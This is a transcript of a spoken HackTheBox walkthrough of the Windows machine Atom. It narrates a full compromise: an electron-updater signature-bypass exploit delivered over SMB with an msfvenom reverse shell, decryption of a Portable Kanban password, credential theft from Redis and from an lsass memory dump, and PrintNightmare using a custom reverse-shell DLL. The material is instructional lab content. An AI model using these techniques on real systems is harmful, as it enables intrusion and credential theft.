What's going on YouTube? This is Ipsec. I'm doing Adam from HackTheBox, which in terms of application reversing, it's pretty easy. You can decompile the app, find out exactly what's going on, or you can just run it on Windows, TCP dump it, and see the exploit path. That being said, if you have no experience in application reversing, this is pretty tough because you don't know exactly where to start with analyzing an Electron app. There's not a lot of good starting material out there for it. So this is a tough, easy box. It starts off with exploiting the auto-updater put into an application, and with that you get shell on the server, and then the privask is based around Portable Kanban, which we've seen before in the Sharp video. But after we do the box once, it's also vulnerable to PrintNightmare, so we're going to go in and exploit the box that way after we do it the first way. So with all that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Adam, and then the IP address of 10.10.10.237. This can take some time to run, so I've already ran it. Looking at the results, we can see there's 4 ports open. The very first one is HTTP on port 80. We can see it is running Apache. It's a 64-bit Windows, and it has the OpenSSL and PHP module loaded. So if I do like a dir bust, I'm definitely going to specify the PHP extension because if there's PHP files, we have 135, which is just MSRPC. Then we have HTTPS, and looking at the certificate, its common name is localhost, so it doesn't leak the host name there. Then we also have 445, and it's telling us it's Windows 10 Pro 19042, and not too much information there. We do have a clock skew of, I guess, 4 minutes maybe, and it's telling us the computer name is Adam. So when I look at HTTPS, I'm going to specify the Adam host name just to see if there's a different virtual host. And that's about it. So let's go right now into my etc host file, and we're going to say Adam, or 10.10.10.237 is Adam. So before we do anything, I'm going to run RPCDump, then at 10.10.10.237. And all this is going to do is dump a bunch of just like RPC endpoints, but there was a very recent exploit that came out called PrintNightmare, and I'm just going to search for the Microsoft Remote Printing, and if we see it here, we're going to try to do PrintNightmare at the end of this video. So we do have it here. In order to exploit this, we need a user account, so we don't have any passwords, so it's just kind of a note here. But definitely, because we see this, we should try PrintNightmare. So let's see. We should open, I guess, Firefox now and take a look at what's on the web page. So opening up Firefox, go to 10.10.10.237, and we see a web page, Heat Solutions. We have downloads here, an email, and adam.htb. So we have a host name at the bottom. So I'm going to add that in this. And we're going to keep on going. I'm just looking for other things, other links, and I don't see anything. On this about, it's not going anywhere. So before we dig into this box, let's set up a bunch of recon so we have stuff running while we poke at it. So the first thing I want to do is a full port scan, so nmap-p- OA, nmap, and then we'll call it Adam all ports, 10.10.10.237. I'm also going to run GoBuster. So GoBuster, put it in dir mode. Word list is going to be opt, seclist, discovery, and then web content, raft, small words. Let's see, lowercase. This is a Windows box. So if I look at, I'm guessing this is either index.php or index.html. Index.html. Windows is not case sensitive. So if I do to capital N and capital D, we get it. On Linux, it is case sensitive, so we can't do this. So that's why I'm specifying the lowercase word list with GoBuster, because casing doesn't matter and we can save a lot of just request, which saves time. I'm going to do the PHP extension, and then output, we're going to call this GoBuster root php.txt. URL not set. Is it -URL? And we'll do HTTP 10.10.10.237. Let's see. Unable to connect to RL. I wonder if we put 10.10.10.237. There we go. It's been a while since I ran GoBuster apparently. So we have that running. We have nmap going. We can take a look at this page. So I'm going to try just go to http://atom. Goes the same thing. We can try atom.htb. Same thing. HTTPS. Accept the certificate. Same thing. So it doesn't look like anything special there. Looking at this download link, we do have a /releases directory. I'm just looking at the bottom left of my screen. So I'm going to try to go to atom.htb/releases to see if they have an open index, and they do, but it's only got the zip. I was really hoping that like the coming soon for Mac and Linux would be there. They just didn't link it on the website, but that is not the case. So let's download this Windows one. It's going to download heed setup. So let's cp downloads heed setup.zip to an atom directory. And there is one piece of recon we did not run yet, and that is looking at port 445. So I'm going to do smbclient -N-L 10.10.10.237. And we see there is a software updates directory. And I think this -N is null authentication. So I'm going to take a look at software updates. So looking at software updates, I just hit enter for a password. We don't have one. There is client 1, client 2, and client 3. So I'm doing a dir against each of those directories. Nothing there. And then we also have this UAT testing procedure. So we download it, and we can look at this PDF. So I'm going to open up Places, Home, then HTB, Atom, and look at the PDF. And what is Heed? It's a note-taking application built with Electron Builder, which helps users taking important notes. So this is definitely key to know. We may want to research exactly what Electron Builder is, but it's talking about a library, and if a library is vulnerable, then the application is vulnerable. So it's talking about it, talking about the update server, and that's about it. So we know what we just downloaded, this Heed setup, is a probably Electron app built with Electron Builder, and it has an auto update feature. So I'm looking at this. It is a setup. So I'm going to do heed v1 setup.exe. It's a self-extracting archive, and I'm sure there's a command line thing to extract this, but I don't know it. Thankfully, like, GUIs are smart enough to just automatically do things. So I'm going to double click on this exe, and boom, we have it. I'm going to rename or move the plugins folder into this directory. And then I'm going to rename it because I don't like my folder starting with a $sign. So I'm going to call this Heed. And we go into this, and we can see it's got a few DLLs and this app64 7-zip. I'm going to make dir app, and we'll cp this into it. And whenever I extract something, I have a habit of always clobbering directories. So that's why I copy it into it and then extract. So 7zx to extract. And you can see it put a bunch of files in this directory. So if I did it in this heed, it would just pollute the directory and look bad. So always like move stuff into a directory when you extract if you want to avoid that. I'm just deleting the 7-zip there. So we can look at all these files, and you don't have to do it this way. If I had a Windows machine handy, which we'll go look at, we just open the app and kind of do dynamic analysis. What we're doing here is reversing or decompiling this Electron app to get it back into JavaScript, and then looking at it that way. So there's two different ways we can do this. Typically, I prefer just decompiling the Electron app because this way we can see if there's any hard-coded secrets in it, like a password. So we can more easily see that. So if we go into resources, we have ASAR, which is another like zipping technology. It's just data. Electron, I don't know what elevate.exe is. It's probably some UAC thing. We got app-update.yaml. If we look at it, it's telling us the application is at updates.atom.htb, so yet another thing to put in our host. So let's do updates.atom.htb, And yeah, it was updates. So let's go to HTTP updates atom.htb to see if we get a different page, and we don't. It's still all the same. Okay. So let's take a look at this ASAR. And if you don't have this tool, you can do sudo npm, then -g install ASAR to download the extractor. And then ASARL on the file. So we can see all the files inside of this archive, a bunch of node modules, and then at the parent we have this main.js. So I'm going to make dir app, and then cp app.asar to app. Go here, and we can asar e app to extract. Let's see. I guess we can say so extract file app asar, and let's just get main.js out of there. I'm sure there's probably a way to extract everything with this. Man asar -h list extract archive. So if I just do asar app then dot, let's see, let's remove main. Put our working directory. Let's see. If this doesn't work, we'll just move. Extract file, ASAR, extract, then the archive and destination. So something's not working clearly. Oh, wait. I probably specified F with it. No? Okay. I'm not sure. I'll have to look back at the video what happened, but there we go. We have now extracted everything out of this ASAR. We can look at package.json to see what it is. We do have electron-updater, electron log. It's an open source application. Well, maybe it's not open source anymore because I don't see a Git repository on this box. If we do /.git, nope, nothing. So we have a create note.html and main.js. So the first thing I do is remove the archive, and we can take a look at main.js. So it's using electron-updater. It's got a function create note. It's going to load out of the directory name create note, template, create, delete, quit, and then app on. We got a checking for updates, updates available, updates not available. Is there any auto updater? Can we see the code for this? Transport file. I don't see what auto updater is doing. Let's see. Grep auto update. Let's do a -i to case insensitive, and @r to recursively search everything. And then we can less. So let's see, auto updater. So it's using electron-updater, I guess. So if we go back to Google and we look at electron-updater exploit, I think. Let's go google.com. And we have this signature validation bypass leading to RCE and electron-updater. And it's using electron builder, fail open design. It's talking about a lot of things. But this is the YAML file for updates. So I'm going to go up a few directories. And one more. Yeah. There are a lot more files in here than I expected, but it's all normal. I'm going to make this exploit. And I'm going to do latest.yaml and make this valid. There we go. So all this exploit is if you have a quote within the URL or path, it's going to break the signature check and let you execute code. So pairing this information up with the fact there's a SMB share that has software updates, I'm guessing if we place a YAML file that says execute a random executable, it will execute. So let's go and test it out. I'm going to use MSFVENOM to list payloads so we know what payload we want, because I don't have all these payloads memorized. I want to choose just a simple reverse shell. So I'm going to do a shell reverse TCP. That sounds good. So MSFVENOM-P, this, and then we can say lhost 10.10.14.8. That needs to be lhost equals. And then lport is equal to, you guessed it, 9001. It can be anything. I just like choosing that because, well, it's got to be over 9000 in my mind. So I'm going to now specify -F for format, exe. I want to say it's F. We'll find out. And then we'll call it rev.exe. So let this run. We should get an executable. And I'm going to file rev.exe. We see it is a PE32 executable, which is good. That means it's an exe. And it's also 64-bit. I forgot to specify the architecture, but it was smart enough to do that for me. So that is good. We have the size of 7168 bytes. So let's go back over to our YAML file. Let's see. Let's move rev.exe into exploit and go into latest. We already have it open up here. Let's see the size. I'm going to update the size. I don't know if we have to. And then this SHA sum for it looks like it's base 64. Typically SHA sums or any type of sum is only going to be hex. So seeing like PE, which is not valid hex, like A through F, capitals, equal signs, definitely big indicator it's base 64. So let's do a SHA 512 sum on the executable. It's rev.exe. We only want to grab this first piece. So I'm going to awk print 1. And then this is in hex. Typically, when you see base 64s of hashes, it's a base 64 of the actual data. The hash isn't this. It's actually the hex representation. So if we do xxd-r-p, this is the actual hash. If I now do wc-c, 64 characters, so 64 bytes, I mean, but this is the hash. So now I can base 64 it, do -w1-wrap to put it all on one line, or I think I said W1, it's W0. W1 would put like one character per line, which would be hilarious. But yeah, wrap 0 to disable line wrapping. So now we can put our thing here. And the version, I'm going to go over 123 because I'm guessing like if it's running version 4 and we give it version 1, it's probably not going to update. So I'll do 1.3.3.7 and we'll see what happens. We can do 1.3.3.7. There we go. And then we called it rev.exe. So let's see if this works. Release date, we can update that to be 2021. And we'll do today's date, 07/09. There we go. So let's do SMBclient 10.10.10.237 / was it software updates. Log in. And let's see if we can write to any of these client directories. But first, nclvmp 9001. Let's put latest.yaml and put rev.exe, and we'll call it rev.exe with that single quote. We do a dir here, and let's just wait for 60 seconds to see what happens. So I'm going to pause the video, and we'll see what happens when that sleep finishes. The sleep has not finished, but I do, well, it finished as I was saying that, but I got a reverse shell back. So if I do a who am I, we can see we are Atom/JSON, or Atom/JSON. I don't know why my mind just went to JSON, probably because I'm dealing with JavaScript. But the one thing I forgot to do is RL wrap, which is really annoying. So I'm just going to exit this. I'm going to do RL wrap with that reverse shell. We probably have to put the files back. So put rev.exe, put rev.exe, rev.exe, and then put latest.yaml. Okay, now let's wait for another shell. It's just RL wrap makes the reverse shell on Windows a bit more manageable. So don't have tab autocomplete, but tab doesn't screw things up. So if I do dir, we can look at that software updates directory. We have examp. If I go into this, I can't, so I don't have permission to do that. My idea was if I can go into the web directory, write a file. So this is a PHP server. If I just write like shell.php, get a reverse shell or command execution as IIS, then maybe I could do like a potato exploit. Because if I do whoami/priv, I don't have sempersonate. But if I exploited a service on this box, I'd most likely have that permission. So since I can't write a shell, I'm just going to look at the files. If I go to desktop, we can get the flag. We have links here. I could like play with editing a link to make it malicious. However, JSON would click that and we're already JSON, so nothing really there. Look at .config, that sounds interesting. There is a config store, so let's go into this directory. This is a Electron thing. Let's look in documents. That's the UAT testing procedure that we already looked at. Let's go to downloads, and we have Kanban. So let's go into downloads, Portable Kanban, and this is, I forget exactly what this application was, but if you go to ipsec.rocks and search for Con, we can look at it being used in Sharp. So this piece is probably going to go pretty quick because we've done this once before. So looking at dir again, I'm going to pull the config. So I'm just doing type. It's probably get child item in PowerShell I should do to stay in PowerShell, but I'm lazy. So I'm going to copy this because I think this is just a big JSON file, and then we're going to look at it with JQ on our Linux machine. So copying all of this. Come on. There we go. Let's go over to Linux. Make dir move priv to Kanban. vconfig. How do I insert? There we go. Then cat config jq dot. Oh, maybe it's what? Invalid numeric literal line 1. 1106. There's some piece of thing that's breaking JSON. Let's see exactly what character that was at. It looks like 1106. So if I go and just type 1106 and then hit the pipe, it brings me to that spot and I can look at what it looks like. And right off the bat, this is weird. So maybe this isn't valid JSON. We have a double quote, a name, a bracket, a double quote, and double quote. So this is some different serialization format. So JQ is not parsing that. So let's just do the lazy way of cat config. And then let's sed search for all commas, replace them with line breaks, and we can less this to go and view things. So we have it doing a Redis server, localhost 6379. I'm going to go back to my recon, and we can see when I did all ports, we do see a WinRM and also Redis. Awesome. So let's go looking at this. We have a encrypted password of this, And from the sharp machine, remember, Kanban just stores things with a like static secret, so we can just easily decrypt this and then get what the database password is. Because if I use Redis, let's see, Redis-CLI -h 10.10.10.237. Let's see. Help. Let's see, what can I do with Redis? Let's just try a simple command like ping. We get authentication required. So in order to do anything within Redis, we need to authenticate. Thankfully, we have the password. So I just want to go to CyberChef. So go Google, CyberChef, go here. And then the other thing we need is the Kanban static secret so we can decrypt this. So to do that, let's go back to Google and search just Kanban decrypt. And it looks like we have an exploit right here. So let's see, we got the key and initialization vector. So let's go back to CyberChef. Make sure we have this copied. I think it's copied. Paste? No. Let's see. If I highlight it this way, there we go. I don't know why it wasn't highlighted before, but oh well. So this looks like it's probably base64'd. I'm going to echo-n base64-d. It gives us a bunch of gibberish, but we don't see invalid data, so we know it is indeed base64. If we remove a few characters, they remove like, if I saw this invalid input, then I may think it's just raw or something, but because I didn't get that, I'm going to assume it's base64. Now, going back here, it is des, so I'm going to copy the des key. And I'm going to search for des decrypt in CyberChef. And I'm going to paste the key, and we need initialization vector, and initial is that. So let's paste this. And then we want to change this to be, let's see, is this base64? Maybe. So let's do base64, invalid key, 6 bytes. So a des key, maybe that's 8. 1, 2, 3, 4, 5, 6, 7, 8. So maybe that's not base64. Maybe that's just raw. So let's do this. And unable to decrypt with those parameters. Change this to raw. And we have it. So the password is kid vs cat yes kid vs cat. But we have the password decrypted. So we can now go and probably use Redis to dump it. So we do the Redis-CLI. And then we can auth. So I just do auth and we do the password. There was no username in that config, I think. So auth the password, we get OK. If I do ping, it says pong, so now we know we are authenticated. We can do keys stir to list all the keys in this database. And the one that looks interesting is this right here, the one that says user. So I'm going to get, I'm going to paste that. And we have the ID, the name is administrator, email is nothing. And we got the password right here. It is an admin. So I'm going to copy the password, go back to our CyberChef, paste it, and the password is kid vs cat admin at 123. So I'm going to copy this, and we'll do, let's see, psexec.py, is it administrator at 10.10.10.237. Paste the password, requesting shares, uploading, and we have a shell. We could also use like wmi-exec or evil-winrm. There's a ton of ways we can get access to this, but yeah. The reason why I killed that is I did dir in the system32 and it took forever to get output. But if we go users, administrator, and then we look at desktop, we can get root.txt. So that'll be pretty much the box, but I said we'd look into PrintNightmare, so let's do that. The first step is we have to get a low privilege user's password. I'm going to try to dump lsass. So let's do it that way first. Let's see. I want to dump process run DLL32. I'm looking for like a red team tips page on using run DLL32 to dump a process. There we go. Our red team. So talking about all the ways we could upload Mimikatz, but that's not fun. We don't want to upload Mimikatz. We want to do this feature. There we go. So let's go and do task list because we have to get lsass's process. Maybe I should have used evil-winrm because it would have been much faster. Let's see. Evil-winrm -u administrator -p. Go over here. Copy, paste. Ooh, that's not the password. Let's try Control-Shift insert. There we go. -I 10.10.10.237. There we go. Task list. Much faster. So we want to look at lsass. And that is running as PID 680. Is that what this example was? 624. Close. So mini dump 680. And we'll do it to users, administrator, documents. Let's see. There we go. And now we have lsass.dump. So I think I can just do get lsass.dump. Let's see. It's question mark run evil-winrm commands. No. Let's see, is it download? There we go. So it is downloading. I type. What? Did it actually, is this the file? That's going to be funny if it worked. I'll have no idea how it worked. Okay, it did not. So it is downloading now. What directory was I in when I ran this? Probably where I'm at now. Yeah, HTTP Atom. So we got to wait for that process to finish. In order to do this, we probably have to use Pypykatz. Let's see. Python cats. Google. Is it Pypykatz with a K? There we go. This is a Mimikatz implementation in Python. So cd opt, get clone. It is really slow at copying files in evil-winrm. It's like copying it 1 byte at a time or something. It's not that big of a file. But we can get this running. So let's see. Python 3 -v. What is the syntax to do virtual environment? It's not -v, it's -m for module, and then venv, and we're going to just create the environment venv. And all this does is make it so we don't clobber ourselves. So we created this virtual environment directory, and it loads all the Python things. So when I install this, it's going to load it into the venv and not clobber my system. Very important. So let's do source venv bin activate. And now we see this VM prompt, so we're in it. So now when I do Python 3 setup install, it should be installing to this custom environment. Yeah, installing Pypykatz to opt Pypykatz virtual environment bin. Awesome. I don't know why it's going to HTTP cloud. It's doing that with something else, and it made for a bad time. Is there requirements.txt? Find.grep require. Let's see. pip3 install. Is this gonna work? Hey, I think it does. Let's see. See what I'm doing now. lsvm bin. Do we have it? Let's see if it works. It looks like it does. So once we get this file, we'll be able to use Pypykatz to hopefully dump it. So I'm going to pause the video and wait for this to finish. So it has finished now. I can do Pypykatz. We'll do lsa-h. And we want to either specify mini dump or recall, then the memory file. Let's try recall, and then home, home ipsec htb atom lsass.dump. No module recall. Let's do mini dump. Let's see, mini dump with a P. And we have it extracting things. So let's see if we get a password. Login session. I'm thinking we will, because a user probably is logged in interactively in order to open that atom app to get the code execution. So that's administrator's NTLM hash. Ooh, this is looking good. And there we go. We got Jason's password. I think I said JSON again. Jason's password right here. Kid vs cat electron at 123. So what we can do is crack map exec 10.10.10.237 SMB-U JSON-P to make sure this is indeed the password. Let's see, I think it's CME 10.10.10.237 like that. No? Is? Okay, it is. Don't fault it when it works. So now we have Jason's password. So we want to do the, what is it? Let me just save this to a file. So vcreds JSON like that. Administrator. Do I still have it? If I don't, it's not the end of the world because we don't need it anymore. I wish I saved the Redis password. I bet I could grab it. Right here. Auth. It's not worth it. Oh, or LWrap. It's probably this one. Auth. It's lost in the ether, but we have the passwords that matters. I just did that in case I forget the password and can't find it. So we have creds. It should always take notes. I'm going to search for cube 0x0 PrintNightmare because this is the Impacket version of this. It's on his repo. So we have the CVE and both the Impacket and the .NET. I'm not going to worry about the .NET one. We're just going to use Impacket. So cd opt, and I'm going to git clone. And he added a few modules to Impacket. So we also have to download that. Let's see. Does he say? Yeah, he's saying uninstall Impacket, then install his. But we're going to do a virtual environment of Impacket. So let's do Python 3-m VM. Actually, let's do make dir print nightmare mv cve to print nightmare, and then go into it, and then move Impacket to this directory. There we go. So now we can do Python 3-m virtual environment, cd Impacket, then pip3 install the requirements.txt, and then we can do, thankfully it didn't really change too much, but you should never do that because I did not activate my environment. So source bin vm activate. There we go. So now we can install everything. And we can run setup.py. And you don't have to do that requirements to, or like the pip install requirements. You should just be able to run this install, but copying the parent box to this screwed something up, and that's how it worked for me. Sometimes you don't troubleshoot things. You're like, oh, it works. That's just how life is now. So that's essentially what I did there. So we should have Impacket's version here. We did the install, so we can go into this directory. And then there is one thing right now that I like. This pull request, it updates the exploit to remove a brute force. It's a bit more reliable if we do it this way. I had to do this actually on a pen test I was on yesterday. So I'm going to kind of walk through some of the troubleshooting I did because there was some type of EDR blocking me from doing the default, like creating a DLL to add a user. So I had to go with a reverse shell. So I'll kind of simplify it, go through my troubleshooting, and yeah. So the only thing this poll changed was this file. So I'm just going to call this update, we'll call it PrintNightmare.py. Doesn't really matter what we call it, but I just want the updated one. The other difference between this is we specify a driver name. So what this exploit does is it loads a DLL, or installs a printer, which is just a DLL. So you have to call it something. You can call it anything you want. And I think the default for this is 1234. Let's do vim this. Is it 1234? Yeah. Printer name is 1234. So the updated one puts that as a argument. So Python 3, printnightmare.py, we have to specify the target, driver name, share. So let's do Python 3. The target is going to be JSON : the password. So let's cat creds and grab JSON's password. And then at, ooh, that's going to be weird. It's normally like user : password at hostname, but the password has an at, so I'm not sure if Impacket's going to be smart enough to only pull the last one. But we'll try. 10.10.10.237. Okay, the printer name will be please subscribe. And then the path of the DLL. So in most cases, you'll probably upload this to a file server. In my case, I uploaded it to a file share that was on a NAS that accepted scans. But you can upload it anywhere that the target machine can access over SMB. Chances are it won't be able to access SMB over the internet. So keep that in mind when you do the exploit. But NC LVNP 445. And I'm not like trying to get code execution right now. I just want to see if it's going to reach out to me. So all I did is give it an SMB and we run it, and file not found. Wait, what? How is it no file not found if maybe I put this in quotes? There we go. So you want to put that in quotes. We get a SMB thing back. So we know we actually got something to execute. So we have to create a DLL. We can use MSFVENOM to create the DLL, but chances are if you just go that route, you're going to have to deal with antivirus, which it's not fun. So what I'm going to do is create a DLL. So let's go over to a Windows machine. And I'm going to go into Visual Studio, and I have a reverse shell up already. I did not clean up from when I was working earlier. So I guess I'll just show how I got this. Let's see. Open up Edge. And I just Googled C++ reverse shell. and that went to a website like Bank Security. Let's see, Bank Security, and we can code them in anything. I like C++ over .NET, so I went to his C++ one, and if we look at the code, all I did was pretty much copy this code. We can see WSA startup, make D word, everything, or make word. So we have the reverse shell here. I just copied it into a function. And then again, all of these I have up here. And how everyone like online does this exploit is instead of calling rev shell here, they just call like system and then cmd/c net user ipsec please subscribe /add, and then they call like net, I think, local group administrators /add administrators ipsec, something like that. But this wasn't working for me. Not sure exactly why, so I had to go with a reverse shell type route. And as I was trying and with this net user and nothing was working, I decided I'd compile that as x86, which is 32-bit, and seeing what error message it gives me. Because you saw, let's see, let's go in the SMB. Let's just start the server. Let's see, touch test.dll, and we can do SMBServer, ip share pwd. Okay. So if I run this and we do share /test.dll, we can see login failure. Oh, wonder if I can get rid of username and password. Probably not. I haven't actually done it this way. Okay, I think that worked. Specified server can't perform the operation. So that's that error message. If we give it something that does not exist, let's see if it says the file can't be found. No. So, shoot. Do we have, let's see. I was not using my built-in file server and Impacket when I did this before. So this, we're going slightly different than I'm used to. Cube 0x0, GitHub. Let's pull it. Let's see. SMB.conf is what I need. Okay. Sudo v etsy. Let's do cd etsy. Sudo cp. Samba smb.conf to Samba smb.conf as a backup. Sudo vi. Delete this file. Paste the new one. Okay, so map to guest, bad user, share 445, that's fine. Guest okay, read only no. Okay, so I just want to home ipsec htb atom smb. Service SMBD restart. Sudo. There we go. So if we try this again with test.dll, what do we get? It connects, it goes to execute, network name can't be found because we call it something else here. Comment Samba. Maybe it is Samba? Or SMB. There we go. The share name is this. No such user. Let's see, force user. This is getting annoying. Let's just force it to be me. Probably not the most secure thing, but I like to live dangerously. Okay. So by just giving it a blank file, this is actually the same exact error as I get from it being 32-bit. Exact machine type mismatch. So this tells me it's actually loading the DLL. The first step is to give it a file that doesn't exist, and you see it can't find the file specified. So we have 3 pieces of troubleshooting right now. The very first one is we just did netcat and we saw the server connected to us. So we know it makes a connection. The second piece is we go on a file share and give it something that does not exist. And it tells us the file does not exist. So now we know, number 1, it connects and it downloads a file. Then we give it a file that it can't load. So in my case, it was a 32-bit, but if you just create a blank file, you get this exe type mismatch. So you know it's actually doing something with that DLL. So now the third piece of this is, that's not the right machine, is to give it a reverse shell. So let's compile this for 64-bit, bin, rebuild solution, and hopefully this works. Okay, so I can just copy this, and then we just got to copy this DLL to a box. So let's go 192.168.230 SMB, and we'll copy this, and we just called it DLL1.dll, and we should do a nclvnp. What port was I doing it on? I think I was doing it at 80. Let's see. So 10.10.14.8. Here's the port, 80. We have to sudo because that's a privileged port. And now we run this. And boom, we are now system on the box. So that's doing the box through PrintNightmare. And this is probably like how I did the troubleshooting based upon it connecting, it checking the correct file, the version mismatch between 32 and 64-bit. Those are all critical like troubleshooting things. You just break it into smaller pieces. That helps you greatly when you try to like break into this field, or if you're trying like the OSCP. If you try an exploit, it doesn't work, don't like keep doing a bunch of tweaks to it. Try to simplify the exploit and then find out exactly like, yes, it's making it this far. Okay, it's making it this far. It's making it this far. Okay, now I can do the final leap. In my case, my net user command wasn't working. I'm not sure if it's EDR, cmd.exe was blocked, etc. So I was just like, okay, how far is this going? And I couldn't do the connect back to me because, again, it was going through a firewall. But I could say, okay, well, it's definitely checking the file share because I'm getting this file does not exist. And when I give it a 32-bit file, it gives me a different error, so I know it's doing something with the DLL. So knowing that, let me try changing the DLL up because obviously that piece isn't working. So hope you enjoyed the video. Take care, and I will see you all next week.